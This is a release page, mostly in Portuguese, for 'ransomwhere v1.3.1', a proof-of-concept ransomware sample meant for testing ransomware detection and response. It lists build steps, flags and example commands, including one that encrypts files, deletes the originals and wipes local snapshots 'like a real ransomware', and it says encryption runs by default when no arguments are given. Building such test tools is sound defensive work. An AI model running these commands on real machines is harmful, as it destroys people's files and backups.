Voltar às atualizações
New releaseAug 20, 2026

ransomwhere v1.3.1

Uma amostra de ransomware PoC para testar sua estratégia de resposta a ransomware.

Compartilhar

Ransomwhere

Uma amostra de ransomware Prova de Conceito que criptografa seus arquivos para testar suas estratégias de detecção e prevenção de ransomware. Se nenhum argumento for fornecido, o ransomwhere executará automaticamente o modo encrypt sem excluir os arquivos originais.

Não me responsabilizo por qualquer dano causado por este software.

Compilação

# with make and Go installed
% make build

Uso

% ransomwhere -h
Usage of ransomwhere:
  -delete
        Delete files after encrypting.
  -log string
        The log level to use. (default "error")
  -mode string
        Encrypt or decrypt the ransomware files. (default "encrypt")
  -path string
        Path to the directory where to traverse files to ransom. (default "/Users/niels")
  -wipe
        Wipe local snapshots while encrypting.

Exemplos

# straight from source, encrypt in our home directory
% make FLAGS="-log=warn -delete=false -mode=encrypt"

# from the binary, encrypt /home/ransom/
% ./app -log=warn -delete=false -mode=encrypt -path=/home/ransom/

# encrypt, delete original files and wipe backups like a real ransomware (DANGEROUS)
% ./app -delete=true -wipe=true

# revert the ransom operation and restore any files
% ./app -mode=decrypt

Categorias